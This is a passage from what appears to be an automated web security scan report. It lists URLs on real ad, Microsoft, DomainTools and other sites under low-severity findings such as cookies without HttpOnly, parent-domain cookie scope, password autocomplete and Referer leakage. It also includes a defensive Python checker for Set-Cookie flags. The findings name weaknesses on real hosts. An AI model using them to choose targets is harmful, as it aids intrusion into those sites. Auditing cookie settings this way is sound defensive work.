10.14. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms

10.15. http://ad.turn.com/server/ads.js

10.16. https://adwords.google.com/um/StartNewLogin

10.17. http://ak1.abmr.net/is/cache.vzw.com

10.18. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

10.19. http://akamai.invitemedia.com/set_partner_uid

10.20. http://akamai.mathtag.com/sync/img

10.21. http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/CB7517A5C7C813BB2A425B923265579D

10.22. http://amch.questionmarket.com/adsc/d880216/6/42158214/decide.php

10.23. http://amch.questionmarket.com/adsc/d880216/6/42158253/decide.php

10.24. http://amch.questionmarket.com/adsc/d920738/12/42738580/decide.php

10.25. http://api.bizographics.com/v1/profile.redirect

10.26. http://b.scorecardresearch.com/b

10.27. http://b.voicefive.com/b

10.28. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s91786168144611

10.29. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s938140667479

10.30. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s97454771505390

10.31. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s97695995835295

10.32. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s98445279321724

10.33. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s98724351870215

10.34. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s99791251700691

10.35. http://bh.contextweb.com/bh/rtset

10.36. http://c.atdmt.com/c.gif

10.37. http://c.live.com/c.gif

10.38. http://cache.vzw.com/images_b2c/shared/buttons/button_red.gif

10.39. http://cache.vzw.com/images_b2c/shared/layers/overlay_bg.gif

10.40. http://cf.addthis.com/red/p.json

10.41. http://cms.quantserve.com/dpixel

10.42. http://community.axosoft.com/

10.43. http://community.axosoft.com/blogs/fearthebug/archive/2011/05/09/ftb-171-custom-reports-using-date-fields.aspx

10.44. http://community.spiceworks.com/r/595

10.45. http://cspix.media6degrees.com/orbserv/hbpix

10.46. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3698952182471149434

10.47. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3698952182471149434

10.48. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

10.49. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3698952182471149434

10.50. http://d.p-td.com/r/dm/mkt/4/mpid/1051202/mpuid/3698952182471149434

10.51. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4dc0222e-3ec1-3315-901d-9f5b34470a53

10.52. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

10.53. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

10.54. http://dms.technoratimedia.com/setter.cfm

10.55. http://explore.live.com/Handlers/Plt.mvc

10.56. http://explore.live.com/windows-live-hotmail-security-checklist-faq

10.57. http://googleads.g.doubleclick.net/pagead/ads

10.58. http://googleads.g.doubleclick.net/pagead/ads

10.59. http://ib.adnxs.com/getuid

10.60. http://ib.adnxs.com/mapuid

10.61. http://ib.adnxs.com/pxj

10.62. http://ib.adnxs.com/seg

10.63. http://ib.adnxs.com/ttj

10.64. http://ibid2252027210.peachd.dnsstuff.com/style.css

10.65. http://ibid2252027210.plumd.dnsstuff.com/style.css

10.66. http://ibid4216487243.plumd.dnsstuff.com/style.css

10.67. http://id.google.com/verify/EAAAABsfBlgIb5aIMPFtxnqrQP8.gif

10.68. http://id.google.com/verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif

10.69. http://id.google.com/verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif

10.70. http://image2.pubmatic.com/AdServer/Pug

10.71. http://int.teracent.net/tase/int

10.72. http://js.revsci.net/gateway/gw.js

10.73. http://m.adnxs.com/msftcookiehandler

10.74. http://maps.google.com/maps

10.75. http://maps.google.com/maps/vp

10.76. http://odb.outbrain.com/utils/get

10.77. http://p.brilig.com/contact/bct

10.78. http://paid.outbrain.com/network/redir

10.79. http://picasaweb.google.com/lh/view

10.80. http://pix04.revsci.net/J08781/b3/0/3/1008211/133868653.js

10.81. http://pix04.revsci.net/J08781/b3/0/3/1008211/219425509.js

10.82. http://pix04.revsci.net/J08781/b3/0/3/1008211/34052071.js

10.83. http://pix04.revsci.net/J08781/b3/0/3/1008211/446414223.js

10.84. http://pix04.revsci.net/J08781/b3/0/3/1008211/654769031.js

10.85. http://pix04.revsci.net/J08781/b3/0/3/1008211/94949941.js

10.86. http://pix04.revsci.net/J08781/b3/0/3/1008211/951237921.js

10.87. http://pixel.33across.com/ps/

10.88. http://pixel.quantserve.com/pixel

10.89. http://pixel.rubiconproject.com/tap.php

10.90. http://r.openx.net/set

10.91. http://r.turn.com/r/beacon

10.92. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=10227708/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

10.93. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=46949635/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

10.94. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=99071321/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

10.95. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=19608333/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

10.96. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=60538233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

10.97. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=90758083/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

10.98. http://rcm.amazon.com/e/cm

10.99. http://rt.legolas-media.com/lgrt

10.100. http://sales.liveperson.net/hc/44153975/

10.101. http://segment-pixel.invitemedia.com/set_partner_uid

10.102. http://sensor2.suitesmart.com/sensor4.js

10.103. http://sensor2.suitesmart.com/sensor4.js

10.104. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/ads

10.105. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/popular

10.106. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/stats

10.107. http://social.msdn.microsoft.com/Forums/en-US/user/leaderboards

10.108. http://social.msdn.microsoft.com/Forums/en-US/user/mylinks

10.109. http://social.msdn.microsoft.com/forums/en-US/sqlsecurity/threads/

10.110. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/ads

10.111. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/popular

10.112. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/stats

10.113. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/ads

10.114. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/popular

10.115. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/stats

10.116. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/ads

10.117. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/popular

10.118. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/stats

10.119. http://social.technet.microsoft.com/Forums/en-US/stats/thissite

10.120. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

10.121. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

10.122. http://social.technet.microsoft.com/Forums/en-us/category/forefront

10.123. http://social.technet.microsoft.com/forums/en-US/exchangesvrantivirusandantispam/threads/

10.124. http://social.technet.microsoft.com/forums/en-US/exchangesvrsecuremessaging/threads/

10.125. http://social.technet.microsoft.com/forums/en-US/identitylifecyclemanager/threads/

10.126. http://social.technet.microsoft.com/forums/undefined/Notifier

10.127. http://sync.adap.tv/sync

10.128. http://sync.mathtag.com/sync/img

10.129. http://tu.connect.wunderloop.net/TU/1/1/1/
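Sections 10 and 11 are both Set-Cookie attribute findings: a Domain attribute that scopes the cookie to a parent of the issuing host, and a cookie issued without HttpOnly. The checker below is an added example (not XSS.CX's scanner logic, and the cookie headers and hostnames in it are constructed, not taken from any response in this report) that reproduces both checks and, for completeness, the Secure-flag check for https responses. It deliberately does not consult the public suffix list, so a Domain value that happens to be a registrable suffix would be reported as "parent-domain" rather than as one a browser would reject.

```python
def parse_set_cookie(header: str):
    """Split a Set-Cookie header into (name, value, {attr: value}).

    Attribute names are lower-cased; flag attributes (HttpOnly, Secure)
    map to an empty string so membership tests work uniformly.
    """
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header: str, request_host: str, request_scheme: str = "http") -> list:
    """Return (cookie name, finding key, detail) tuples for one Set-Cookie header.

    request_host is the host that issued the cookie; the Domain attribute
    is compared against it the way a browser does (leading dot ignored,
    suffix match on a label boundary). Public-suffix handling is omitted.
    """
    name, _, attrs = parse_set_cookie(header)
    host = request_host.lower()
    findings = []

    domain = attrs.get("domain", "").lower().lstrip(".")
    if domain and domain != host:
        if host.endswith("." + domain):
            findings.append((name, "parent-domain",
                             f"Domain={domain} sends the cookie to every host under {domain}"))
        else:
            findings.append((name, "domain-mismatch",
                             f"Domain={domain} does not cover {host}; browsers discard it"))
    if "httponly" not in attrs:
        findings.append((name, "no-httponly", "readable from script via document.cookie"))
    if request_scheme == "https" and "secure" not in attrs:
        findings.append((name, "no-secure", "will also be sent over plain http"))
    return findings


def audit_response(set_cookie_headers, request_host: str, request_scheme: str = "http") -> list:
    """Audit every Set-Cookie header from one response."""
    out = []
    for header in set_cookie_headers:
        out.extend(audit_set_cookie(header, request_host, request_scheme))
    return out


if __name__ == "__main__":
    # Constructed headers for a hypothetical blog host, not captured from the report.
    sample = [
        "sessid=abc123; path=/; domain=.example.com",
        "prefs=dark; Path=/; Domain=blog.example.com; HttpOnly; Secure",
    ]
    for finding in audit_response(sample, "blog.example.com", "https"):
        print(finding)
```

The parent-domain finding is not a defect by itself: a single sign-on cookie has to be scoped that way. It becomes one when the same parent domain hosts user-controlled or less trusted subdomains, because any of them can read the cookie and, combined with a reflected XSS on a sibling host like the ones in section 3, so can any page the attacker can script there.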

11. Cookie without HttpOnly flag set

11.1. http://blog.domaintools.com/

11.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

11.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

11.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

11.5. http://c.microsoft.com/trans_pixel.aspx

11.6. http://cts-log.channelintelligence.com/

11.7. http://dg.specificclick.net/

11.8. http://fw.adsafeprotected.com/rjss/px/10217/116560/skeleton.js

11.9. http://mad4milk.net/

11.10. http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx

11.11. http://mobilebeta.microsoft.com/en-us/default.mspx

11.12. http://partner.domaining.com/link/

11.13. http://support.domaintools.com/

11.14. http://t.mookie1.com/t/v1/imp

11.15. http://t.mookie1.com/t/v1/imp/cc

11.16. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

11.17. http://a.tribalfusion.com/i.ad

11.18. http://a.tribalfusion.com/j.ad

11.19. http://ad.afy11.net/ad

11.20. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

11.21. http://ad.doubleclick.net/adj/N553.AEAOLService/B4970757.33

11.22. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms

11.23. http://ad.turn.com/server/ads.js

11.24. http://ad.yieldmanager.com/pixel

11.25. http://ad.yieldmanager.com/unpixel

11.26. https://adwords.google.com/um/StartNewLogin

11.27. http://ak1.abmr.net/is/cache.vzw.com

11.28. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

11.29. http://akamai.invitemedia.com/set_partner_uid

11.30. http://akamai.mathtag.com/sync/img

11.31. http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/CB7517A5C7C813BB2A425B923265579D

11.32. http://amch.questionmarket.com/adsc/d880216/6/42158214/decide.php

11.33. http://amch.questionmarket.com/adsc/d880216/6/42158253/decide.php

11.34. http://amch.questionmarket.com/adsc/d920738/12/42738580/decide.php

11.35. http://api.bizographics.com/v1/profile.redirect

11.36. http://b.scorecardresearch.com/b

11.37. http://b.voicefive.com/b

11.38. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s91786168144611

11.39. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s938140667479

11.40. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s97454771505390

11.41. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s97695995835295

11.42. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s98445279321724

11.43. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s98724351870215

11.44. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s99791251700691

11.45. http://bh.contextweb.com/bh/rtset

11.46. http://c.atdmt.com/c.gif

11.47. http://c.live.com/c.gif

11.48. http://cache.vzw.com/images_b2c/shared/buttons/button_red.gif

11.49. http://cache.vzw.com/images_b2c/shared/layers/overlay_bg.gif

11.50. http://cf.addthis.com/red/p.json

11.51. http://citi.bridgetrack.com/a/s/

11.52. http://citi.bridgetrack.com/a/s/

11.53. http://citi.bridgetrack.com/track/

11.54. http://citi.bridgetrack.com/track/click.asp

11.55. http://citi.bridgetrack.com/track/click.asp

11.56. http://citi.bridgetrack.com/track/click.asp

11.57. http://citi.bridgetrack.com/track/click.asp

11.58. http://citi.bridgetrack.com/track/click.asp

11.59. http://citi.bridgetrack.com/track/click.asp

11.60. http://citi.bridgetrack.com/track/click.asp

11.61. http://citi.bridgetrack.com/track/click.asp

11.62. http://citi.bridgetrack.com/track/click.asp

11.63. http://citi.bridgetrack.com/track/click.asp

11.64. http://citi.bridgetrack.com/track/click.asp

11.65. http://citi.bridgetrack.com/track/click.asp

11.66. http://citi.bridgetrack.com/track/click.asp

11.67. http://citi.bridgetrack.com/track/click.asp

11.68. http://citi.bridgetrack.com/track/click.asp

11.69. http://cms.quantserve.com/dpixel

11.70. http://community.axosoft.com/

11.71. http://community.axosoft.com/blogs/fearthebug/archive/2011/05/09/ftb-171-custom-reports-using-date-fields.aspx

11.72. http://community.spiceworks.com/r/595

11.73. http://cspix.media6degrees.com/orbserv/hbpix

11.74. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3698952182471149434

11.75. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3698952182471149434

11.76. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

11.77. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3698952182471149434

11.78. http://d.p-td.com/r/dm/mkt/4/mpid/1051202/mpuid/3698952182471149434

11.79. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4dc0222e-3ec1-3315-901d-9f5b34470a53

11.80. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

11.81. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

11.82. http://dms.technoratimedia.com/setter.cfm

11.83. http://explore.live.com/Handlers/Plt.mvc

11.84. http://explore.live.com/windows-live-hotmail-security-checklist-faq

11.85. http://feedinformer.com/

11.86. http://googleads.g.doubleclick.net/pagead/ads

11.87. http://googleads.g.doubleclick.net/pagead/ads

11.88. http://ibid2252027210.peachd.dnsstuff.com/style.css

11.89. http://ibid2252027210.plumd.dnsstuff.com/style.css

11.90. http://ibid4216487243.plumd.dnsstuff.com/style.css

11.91. http://image2.pubmatic.com/AdServer/Pug

11.92. http://int.teracent.net/tase/int

11.93. http://js.revsci.net/gateway/gw.js

11.94. http://legolas.nexac.com/lgalt

11.95. http://m.webtrends.com/dcs8my4y8000008mal3dy2d80_5y6k/dcs.gif

11.96. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif

11.97. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

11.98. http://m.webtrends.com/dcso6p7z7100004j151amwxpo_5q2j/dcs.gif

11.99. http://m.webtrends.com/dcsour5e80000008ybade4ttg_1i1l/dcs.gif

11.100. http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/dcs.gif

11.101. http://maps.google.com/maps

11.102. http://maps.google.com/maps/vp

11.103. http://odb.outbrain.com/utils/get

11.104. http://p.brilig.com/contact/bct

11.105. http://paid.outbrain.com/network/redir

11.106. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

11.107. http://phones.microsoftstore.com/r.aspx

11.108. http://pix04.revsci.net/J08781/b3/0/3/1008211/133868653.js

11.109. http://pix04.revsci.net/J08781/b3/0/3/1008211/219425509.js

11.110. http://pix04.revsci.net/J08781/b3/0/3/1008211/34052071.js

11.111. http://pix04.revsci.net/J08781/b3/0/3/1008211/446414223.js

11.112. http://pix04.revsci.net/J08781/b3/0/3/1008211/654769031.js

11.113. http://pix04.revsci.net/J08781/b3/0/3/1008211/94949941.js

11.114. http://pix04.revsci.net/J08781/b3/0/3/1008211/951237921.js

11.115. http://pixel.33across.com/ps/

11.116. http://pixel.quantserve.com/pixel

11.117. http://pixel.rubiconproject.com/tap.php

11.118. http://r.openx.net/set

11.119. http://r.turn.com/r/beacon

11.120. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=10227708/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

11.121. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=46949635/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

11.122. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=99071321/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

11.123. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=19608333/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

11.124. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=60538233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

11.125. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=90758083/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

11.126. http://rcm.amazon.com/e/cm

11.127. http://rt.legolas-media.com/lgrt

11.128. http://sales.liveperson.net/hc/44153975/

11.129. http://sales.liveperson.net/hc/44153975/

11.130. http://segment-pixel.invitemedia.com/set_partner_uid

11.131. http://sensor2.suitesmart.com/sensor4.js

11.132. http://sensor2.suitesmart.com/sensor4.js

11.133. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/ads

11.134. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/popular

11.135. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/stats

11.136. http://social.msdn.microsoft.com/Forums/en-US/user/leaderboards

11.137. http://social.msdn.microsoft.com/Forums/en-US/user/mylinks

11.138. http://social.msdn.microsoft.com/forums/en-US/sqlsecurity/threads/

11.139. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/ads

11.140. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/popular

11.141. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/stats

11.142. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/ads

11.143. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/popular

11.144. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/stats

11.145. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/ads

11.146. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/popular

11.147. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/stats

11.148. http://social.technet.microsoft.com/Forums/en-US/stats/thissite

11.149. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

11.150. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

11.151. http://social.technet.microsoft.com/Forums/en-us/category/forefront

11.152. http://social.technet.microsoft.com/forums/en-US/exchangesvrantivirusandantispam/threads/

11.153. http://social.technet.microsoft.com/forums/en-US/exchangesvrsecuremessaging/threads/

11.154. http://social.technet.microsoft.com/forums/en-US/identitylifecyclemanager/threads/

11.155. http://social.technet.microsoft.com/forums/undefined/Notifier

11.156. http://support.dnsstuff.com/KB/a20/fine-tuning-declude-v41-or-newer.aspx

11.157. http://support.dnsstuff.com/KB/a23/why-cant-i-get-my-ptr-record-from-the-dns-lookup-tool.aspx

11.158. http://support.dnsstuff.com/KB/a27/how-to-enable-and-configure-internal-message-sniffer.aspx

11.159. http://support.dnsstuff.com/KB/a28/how-the-spf-tool-works.aspx

11.160. http://support.dnsstuff.com/KB/a29/mail-server-test-center-mismatched-dns-result-explanation.aspx

11.161. http://support.dnsstuff.com/KB/a30/explanation-optional-server-the-reverse-dns-lookup-tool.aspx

11.162. http://support.dnsstuff.com/KB/a31/explanation-of-the-mail-server-test-center-anti-spam-test.aspx

11.163. http://support.dnsstuff.com/KB/a32/available-declude-variables.aspx

11.164. http://support.dnsstuff.com/News/1/default-news-item.aspx

11.165. http://support.domaintools.com/index.php

11.166. http://sync.adap.tv/sync

11.167. http://sync.mathtag.com/sync/img

11.168. http://t2.trackalyzer.com/trackalyze.asp

11.169. http://tu.connect.wunderloop.net/TU/1/1/1/

11.170. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

12. Password field with autocomplete enabled

12.1. http://67.228.151.70:81/user_session/new

12.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

12.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

12.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

12.5. http://dnsstuff.com/new-tools-a-upgrades

12.6. http://gmf-aeroasia.co.id/

12.7. http://gmf-aeroasia.co.id/WorldClient.dll

12.8. https://secure.domaintools.com/log-in/

12.9. https://secure.domaintools.com/log-in/

12.10. http://support.dnsstuff.com/Login.aspx

12.11. http://twitter.com/

12.12. http://twitter.com/

12.13. http://twitter.com/

12.14. http://webcache.googleusercontent.com/search

12.15. https://webreps.satuitcrm.com/default.aspx

13. Source code disclosure

13.1. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

13.2. http://images.bestbuy.com/BestBuy_US/store/js/admonitor-min.js

13.3. http://meyerweb.com/eric/tools/css/reset/

14. SSL certificate

14.1. https://webreps.satuitcrm.com/

14.2. https://adwords.google.com/

14.3. https://cbks0.google.com/

14.4. https://clients6.google.com/

14.5. https://fpdownload.macromedia.com/

14.6. https://plusone.google.com/

14.7. https://secure.domaintools.com/

14.8. https://ssl.gstatic.com/

15. ASP.NET debugging enabled

16. Referer-dependent response

16.1. http://a.tribalfusion.com/i.ad

16.2. http://a.tribalfusion.com/j.ad

16.3. http://whos.amung.us/pjswidget/

17. Cross-domain POST

17.1. http://blog.domaintools.com/

17.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

17.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

17.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

17.5. http://webcache.googleusercontent.com/search

18. SSL cookie without secure flag set

19. Cross-domain Referer leakage

19.1. http://a.rad.msn.com/ADSAdClient31.dll

19.2. http://a.tribalfusion.com/j.ad

19.3. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

19.4. http://ad.doubleclick.net/adi/N5418.TribalFusion1.com/B5649401.5

19.5. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28

19.6. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29

19.7. http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5621931.6

19.8. http://ad.turn.com/server/ads.js

19.9. http://ad.turn.com/server/ads.js

19.10. http://ad.turn.com/server/ads.js

19.11. http://ad.yieldmanager.com/pixel

19.12. http://adadvisor.net/adscores/g.js

19.13. http://adadvisor.net/adscores/r.js

19.14. http://choices.truste.com/ca

19.15. http://choices.truste.com/ca

19.16. http://citi.bridgetrack.com/a/s/

19.17. http://cm.g.doubleclick.net/pixel

19.18. http://cm.g.doubleclick.net/pixel

19.19. http://dg.specificclick.net/

19.20. http://feedinformer.com/js/google_lander.js

19.21. http://feedinformer.com/search.php

19.22. http://gmf-aeroasia.co.id/WorldClient.dll

19.23. http://googleads.g.doubleclick.net/pagead/ads

19.24. http://googleads.g.doubleclick.net/pagead/ads

19.25. http://googleads.g.doubleclick.net/pagead/ads

19.26. http://googleads.g.doubleclick.net/pagead/ads

19.27. http://googleads.g.doubleclick.net/pagead/ads

19.28. http://googleads.g.doubleclick.net/pagead/ads

19.29. http://googleads.g.doubleclick.net/pagead/ads

19.30. http://googleads.g.doubleclick.net/pagead/ads

19.31. http://googleads.g.doubleclick.net/pagead/ads

19.32. http://googleads.g.doubleclick.net/pagead/ads

19.33. http://googleads.g.doubleclick.net/pagead/ads

19.34. http://googleads.g.doubleclick.net/pagead/ads

19.35. http://googleads.g.doubleclick.net/pagead/ads

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://googleads.g.doubleclick.net/pagead/ads

19.39. http://googleads.g.doubleclick.net/pagead/ads

19.40. http://googleads.g.doubleclick.net/pagead/ads

19.41. http://googleads.g.doubleclick.net/pagead/ads

19.42. http://googleads.g.doubleclick.net/pagead/ads

19.43. http://groups.google.com/groups

19.44. http://ib.adnxs.com/ttj

19.45. http://ib.adnxs.com/ttj

19.46. http://ib.adnxs.com/ttj

19.47. http://ib.adnxs.com/ttj

19.48. http://jqueryui.com/themeroller/

19.49. http://maps.google.com/local_url

19.50. http://maps.google.com/maps

19.51. http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx

19.52. http://phones.microsoftstore.com/eCommerce/PowerReviews/pwr/engine/js/full.js

19.53. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

19.54. http://picasaweb.google.com/lh/view

19.55. http://platform0.twitter.com/widgets/follow_button.html

19.56. http://platform1.twitter.com/widgets/follow_button.html

19.57. http://rad.msn.com/ADSAdClient31.dll

19.58. http://rad.msn.com/ADSAdClient31.dll

19.59. http://rad.msn.com/ADSAdClient31.dll

19.60. http://rad.msn.com/ADSAdClient31.dll

19.61. http://rad.msn.com/ADSAdClient31.dll

19.62. http://rad.msn.com/ADSAdClient31.dll

19.63. http://rad.msn.com/ADSAdClient31.dll

19.64. http://rcm.amazon.com/e/cm

19.65. https://secure.domaintools.com/log-in/

19.66. http://social.msdn.microsoft.com/Forums/en-US/user/leaderboards

19.67. http://social.msdn.microsoft.com/Forums/en-US/user/mylinks

19.68. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

19.69. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

19.70. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

19.71. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

19.72. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

19.73. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

19.74. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

19.75. http://social.technet.microsoft.com/Forums/en-us/user/mylinks

